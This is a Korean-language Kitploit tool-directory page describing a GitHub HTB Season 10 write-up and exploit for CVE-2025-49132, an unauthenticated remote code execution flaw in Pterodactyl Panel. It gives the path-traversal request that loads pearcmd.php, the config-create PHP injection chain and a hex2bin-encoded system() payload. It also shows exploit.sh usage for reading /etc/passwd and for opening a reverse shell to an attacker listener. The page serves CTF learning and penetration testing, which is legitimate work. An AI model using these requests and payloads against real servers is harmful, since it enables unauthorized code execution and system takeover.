Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-49132_HTB_SEASON10 — Pterodactyl Panel (CVE-2025-49132)의 인증되지 않은 RCE 익스플로잇으로, 경로 탐색(path traversal)과 PEAR 명령 삽입을 결합하여 취약한 서버에서 임의의 PHP 코드를 실행합니다. | Kitploit
도구/GitHubGitHub/ahmedf000/cve-2025-49132_htb_season10
Vulnerability AnalysisExploitationWeb Application ExploitationCTFPenetration TestingLearning & Education
GitHubahmedf000/cve-2025-49132_htb_season10

CVE-2025-49132_HTB_SEASON10

Pterodactyl Panel (CVE-2025-49132)의 인증되지 않은 RCE 익스플로잇으로, 경로 탐색(path traversal)과 PEAR 명령 삽입을 결합하여 취약한 서버에서 임의의 PHP 코드를 실행합니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
5개월 전아직 검토되지 않음

CVE-2025-49132 - Pterodactyl 패널 RCE 익스플로잇

HTB 시즌 10 - Pterodactyl 머신 Writeup

개요

대상: Pterodactyl HTB 머신 (중간 난이도)
CVE: CVE-2025-49132
심각도: 치명적 (CVSS 9.8)
공격 유형: 인증되지 않은 원격 코드 실행
영향받는 버전: Pterodactyl Panel < v1.11.11

이 익스플로잇 체인은 다음을 결합합니다:

  1. 경로 탐색 - 로케일 번역 시스템
  2. PEAR 명령어 주입 - pearcmd.php를 통해
  3. PHP 코드 실행 - 파일 쓰기 + include를 통해

버그

Pterodactyl 패널의 /locales/locale.json 엔드포인트는 locale 매개변수를 통해 경로 탐색을 허용합니다:

root@kitploit:~
GET /locales/locale.json?locale=../../../../../../usr/share/php/PEAR&namespace=pearcmd

이는 PEAR의 pearcmd.php와 연결하여 다음을 수행할 수 있습니다:

  1. 임의의 PHP 파일을 /tmp에 작성
  2. 다른 요청을 통해 실행

작동 원리

PEAR (PHP Extension and Application Repository) 는 다음을 수행하는 CLI 도구(pearcmd.php)를 가지고 있습니다:

  • URL 매개변수를 통해 명령어를 수락 (CLI 전용으로 설계됨)
  • 파일을 쓰는 config-create 명령어가 있음
  • 웹을 통해 호출될 때 인증이 없음

익스플로잇 체인:

root@kitploit:~
경로 탐색 → pearcmd.php 로드 → config-create를 통해 PHP 주입 → 악성 PHP 실행

Hex2bin() 트릭

명령어는 hex2bin()을 사용하여 16진수로 인코딩되어 우회합니다:

  • URL 인코딩 문제
  • 특수 문자 필터
  • Nginx/PHP 파싱 문제

예시:

root@kitploit:~
Command: whoami
Hex:     77686f616d69
Payload: <?=system(hex2bin('77686f616d69'))?>

원격 코드 실행

방법: 제공된 exploit.sh 사용

root@kitploit:~
chmod +x exploit.sh

# Get user flag
./exploit.sh flag

# Execute commands
./exploit.sh cmd "whoami"
./exploit.sh cmd "cat /etc/passwd"

# Reverse shell
nc -lvnp 4444  # On attacker machine
./exploit.sh shell 10.10.14.21 4444

참고 자료

CVE 및 익스플로잇

  • NVD - CVE-2025-49132
  • OpenCVE - CVE-2025-49132

기술 자료

  • Pterodactyl 패널 문서
  • PEAR 문서
  • OWASP 경로 탐색

도구 다운로드